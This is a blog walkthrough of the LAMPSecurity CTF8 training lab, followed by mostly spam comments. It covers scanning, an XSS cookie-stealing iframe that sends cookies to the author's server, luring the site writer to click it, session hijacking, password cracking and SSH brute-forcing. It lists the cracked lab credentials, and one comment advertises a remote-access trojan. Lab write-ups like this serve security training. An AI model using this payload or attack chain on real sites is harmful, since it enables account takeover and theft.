April 28, 2019

LAMP Security CTF8 Walk through



In this article I am going to capture the flag for the LampSecurity CTF 8 Challenges. This is a beginner level challenge. We will start with scanning the environment and end with getting the root access, In between my target will be capture the hidden flags. So let’s get started.

List of actions:

  •  Scan the network
  •   HTTP enumeration.
  •  Web vulnerability scanning
  •  Spidering Web directory
  •  Session hijack
  •  Crack the password
  •  Brute-forcing SSH credentials
  •  Get the access and capture the flags
  •  Root privilege

Before start the scanning lets discover the network first with netdiscover.


We have successfully discover our target



1      Scan the network
We will start with network scan with nmap. For this lets execute the below command in Kali console.



After the result we found the following ports are open in the output.

-          21
-          22
-          25
-          80
-          110
-          111
-          139
-          143
-          443
-          445
-          993
-          995
-          3306
-          5801,5802,5901,5902,5903,5904
-          6001,6002,6004,6003

Based on the above result it is confirmed there is a web application running on port 80 so we will chose our start point with the same.



2      Web vulnerability scanning
Let’s scan the web application with Nikto and try to discover the present vulnerability.



After the scan we got the below results which is important for our upcoming walk through.
-          Phpinfo.php page is available to access



-          The application is vulnerable to XXS attack.



Now during exploring the web application, let’s check the source code of the home page.



We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751

After got the first flag we will go with the nikto result and try to explore the phpinfo page.



Great!! We have got our second flag in a row.

#flag#550e1bafe077ff0b0b67f4e32f29d751

3      Spidering Web directory
Now come to home page and read any of the article to get further clue.



While exploring the page I have got a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.



After the scanning result I have got something different which push me to think to check further


Lets try to explore the above path and see what else we can get



Bingo! We have got our third flag
#flag#57dbe55b42b307fb4115146d239955d0

4      Session hijack
Now let’s create a user account to get the user access



I have successfully created one user named “iamuser”. Now got any of the blog and try to check if the comment section is vulnerable to XXS.

Enter the below script and click on preview
<script>alert(‘hi’)</script>



From the above result it is clear the application is vulnerable to XSS.

Now we will try to hijack the session cookie of the writer of the blog and forward it to cookie capture application running inside our own server. To know more please click here to read previous article.

For doing this please paste the below HTML code inside the command box and save it.

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>



Now the above code will give us the session ID whoever visit the comment in the first place. Here we will make the blog writer visit the link to get the cookie id and highjack his session. For doing that we will send the link to him via email and we will wait until and unless he clicks on the link.

Now click on the username 



After that you have to paste the link in contact form and send to the user.



Now wait for couple of minutes we will get the session id inside our server.

We have successfully got the session id

 

Now we will try to get the session by pasting the copied session id using the cookie manager firefox plugin.



Now our next step will be post the sql query and try to fetch the user details.

As we know Drupal’s default table is user and the columns for user and password are user,pass respectively.

So please goto content management and create content, then click on page, now copy and paste the below sql with php code, select the content type as php and then cleck on preview.



You will successfully get the current user details with the md5 password hash.



5      Crack the password
Save it in a file and try to crack using john the ripper tool.


After the cracking process we have got the below results



6      Brute-forcing SSH credentials
Let’s save the users and password in separate files to do our next step which is brute forcing the SSH login.

After that lets execute the below command in the terminal.


And wait to get success message.



So sad, we did not get any success. Still don’t have to worry let’s explore the blogger profile and see if we get any hint further.



From the above screenshot we can see the user Steve is having his user name in the email as spinkton. Similarly we will check each and every user profile by editing the URL and store the user name inside a file.



Now lets try to brute-force again with the new user list.


This time we have got three SUCCESS credentials. Following:

bdio – passw0rd
jharraway – letmein!
spinkton – football123

7      Get the access and capture the flags

Let’s try to login one by one





Great we have got another flag here






Now try to login with the next credential. Nice! We have got another flag inside this.



Let’s move to the next credential. Again! We have got one more flag inside.



8      Root privilege
After all this let’s try to do sudo login to check if this user has root privilege.



Awesome!! We have successfully got the root user.
Thanks for read my article. Please let me know your valuable feedback in the comment section below.








63 comments:

  1. Wow, What an Outstanding post. I found this too much informatics. It is what I was seeking for. I would like to recommend you that please keep sharing such type of info.If possible, Thanks. Integriti Access Control Melbourne

    ReplyDelete
  2. Actually I read it yesterday but I had some thoughts about it and today I wanted to read it again because it is very well written. security company

    ReplyDelete
  3. It has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. security company

    ReplyDelete
  4. The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
    Security Solution firm

    ReplyDelete
  5. It is also the most versatile lamp that you can buy anywhere. modern floor lamps

    ReplyDelete
  6. How important this flexibility is will determine if you want to upgrade to the lamp above. modern floor lamps

    ReplyDelete
  7. breach the security Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks

    ReplyDelete
  8. sentry mba Androrat Download. The best android RAT (remote-administration tool) introduced with a wide range of functions. It includes Androrat APK & Androrat Binder.

    ReplyDelete
  9. But the reality is that they are already being watched by human security personnel, undercover store detectives, maintenance personnel, and www.24response.com high-tech surveillance cameras. And, anytime you enter a private facility, the facility has almost carte blanche authority to watch over your every move.

    ReplyDelete
  10. As we as a whole know, whenever we begin discussing the best precious stone table lamp, we need to begin with Waterford Crystal. https://www.insignis.ro/corpuri-de-iluminat/

    ReplyDelete
  11. Nice knowledge gaining article. This post is really the best on this valuable topic. you can visit

    ReplyDelete
  12. Actually, PC security cameras send the pictures to a DVR hard drive with a recorder.Cctv installation

    ReplyDelete
  13. Without fail, your writing style is top professional; even your website also looks amazing thank you for posting. empresa de seguridad

    ReplyDelete
  14. Skip Energy is a Texas Electric Company situated in Houston. Bob Energy's objective is give more than low Texas Electric Rates to our clients. With inventive and adaptable plans, amazing client assistance, and prevalent client rewards, Bounce Energy offers an interesting way to deal with Texas power.electrician

    ReplyDelete
  15. With mixture able security camera DVR frameworks like our Alnet Systems DVR cards, home and entrepreneurs can begin with simple security cameras alone, and basically add permit later for added IP cameras or extra cards for more conventional CCTV cameras. tampa security cameras

    ReplyDelete
  16. Thank you very much for writing such an interesting article on this topic. This has really made me think and I hope to read more. Stainless Steel Screen Doors

    ReplyDelete
  17. Numerous people are ignorant of how weak their normal security system is a result of the way that the wiring utilized in the system can be handily undermined. cctv camera installation near me

    ReplyDelete
  18. When it comes to safeguarding your house, the most obvious place to begin is with the front door. It's surprising how many people in this day and age still leave their doors unlocked, or use poor locks. Even if you live in a rural area, crime occurs where you live. Your doors' strength and durability is important for home security. A home security door is simply a smart investment. Residential Security doors

    ReplyDelete
  19. thanks for this usefull article, waiting for this article like this again. rastreo gps

    ReplyDelete
  20. Psychological warfare is no uncertainty a terrible confronted advancement which has inundated everybody's consideration. So try not to be shocked to observe a huge number of dollars being spent on global counter psychological oppression and law authorization security arrangements.www.boswen.com.au

    ReplyDelete
  21. A wired camera works similarly, then again, actually the sign is shipped off the capacity gadget through wires rather than radio signs.
    Security Camera Installation

    ReplyDelete
  22. I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. https://singaporesecuritycompany.weebly.com/

    ReplyDelete
  23. Access Control - best poe cctv system uk - Gates - fire alarms. Design Installation & Servicing. Let Contact Fire & Security Supply You with High-Quality Security Systems. View Case Studies. Get A Quote.

    ReplyDelete
  24. You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. security services singapore

    ReplyDelete
  25. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. https://securitycompany123.blogspot.com/2021/09/the-commercial-enterprise-owners.html

    ReplyDelete
  26. I really loved reading your blog. It was very well authored and easy to undertand. Unlike additional blogs I have read which are really not tht good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he ejoyed it as well! check more info about singapore security guard

    ReplyDelete
  27. star wars todesstern lampe I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article.

    ReplyDelete
  28. I like your post. It is good to see you verbalize from the heart and clarity on this important subject can be easily observed... https://cambodiaservices-website.yolasite.com

    ReplyDelete
  29. I have a hard time describing my thoughts on content, but I really felt I should here. Your article is really great. I like the way you wrote this information. https://securityserviceincambodia348794372.wordpress.com/2022/01/03/a-review-of-a-security-service-in-cambodia/

    ReplyDelete
  30. Since 9/11 the security business has seen a spike sought after. With this interest has come the prerequisite for security experts to viably deal with the capital consumed during the framework time on earth cycle and during retrofit projects. Qualtech Security

    ReplyDelete
  31. You have done a great job on this article. It’s very readable and highly intelligent. You have even managed to make it understandable and easy to read. You have some real writing talent. Thank you. Reliable Security Service in Cambodia

    ReplyDelete
  32. I’m very happy to read this. This is the type of manual that needs to be given and not the random misinformation that is at the other blogs. Appreciate your sharing this best doc. news

    ReplyDelete
  33. I have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! get info here for cambodia security company

    ReplyDelete
  34. Thanks for taking the time to discuss this, I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me. https://penzu.com/p/7a1e7bc2

    ReplyDelete
  35. planet lamp Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info.

    ReplyDelete
  36. This was really an interesting topic and I kinda agree with what you have mentioned here! security company in sihanoukville

    ReplyDelete
  37. I am happy to find this post Very useful for me, as it contains lot of information. I Always prefer to read The Quality and glad I found this thing in you post. Thanks Uniarch

    ReplyDelete
  38. Great job for publishing such a beneficial web site. Your web log isn’t only useful but it is additionally really creative too. https://teresasean9.wixsite.com/my-site/post/benefits-of-being-a-school-security-guard

    ReplyDelete
    Replies
    1. galaxy lampe A very awesome blog post. We are really grateful for your blog post. You will find a lot of approaches after visiting your post.

      Delete
  39. I wanted to thank you for this excellent read!! I definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. security company in cambodia

    ReplyDelete
  40. Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks best security company in cambodia

    ReplyDelete
  41. I read that Post and got it fine and informative. security company in phnom penh

    ReplyDelete
  42. Hey, I am so thrilled I found your blog, I am here now and could just like to say thank for a tremendous post and all round interesting website. Please do keep up the great work. I cannot be without visiting your blog again and again. https://security-s-school-1cc6.thinkific.com/courses/your-first-course

    ReplyDelete
  43. Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. private security company

    ReplyDelete
  44. This particular is usually apparently essential and moreover outstanding truth along with for sure fair-minded and moreover admittedly useful My business is looking to find in advance designed for this specific useful stuffs… nachttischlampe mond

    ReplyDelete
  45. Hello I am so delighted I located your blog, I really located you by mistake, while I was watching on google for something else, Anyways I am here now and could just like to say thank for a tremendous post and a all round entertaining website. Please do keep up the great work. security guard phnom penh

    ReplyDelete
  46. Thank you because you have been willing to share information with us. we will always appreciate all you have done here because I know you are very concerned with our. buy alarm monitoring system

    ReplyDelete
  47. This is my first time i visit here. I found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here keep up the good work security guard sihanoukville

    ReplyDelete
  48. It was wondering if I could use this write-up on my other website, I will link it back to your website though.Great Thanks. https://security908s-site.yolasite.com

    ReplyDelete
  49. Thank you ever so for you blog article. Thanks Again. Cool.
    data archiving price

    ReplyDelete
  50. Really informative article post. Really thank you! Really Great. cctv surveillance system

    ReplyDelete
  51. I loved your blog post. Really thank you! Will read on... data archiving in singapore

    ReplyDelete
  52. We give our clients expertly gifted security labor at different levels.
    Alpha Security Montreal

    ReplyDelete
  53. Bodyguards are highly trained professionals who prioritize the safety and security of their clients. Alpha Sécurité Montréal

    ReplyDelete
  54. Bodyguards are highly trained professionals who prioritize the safety and security of their clientsAbdullah

    ReplyDelete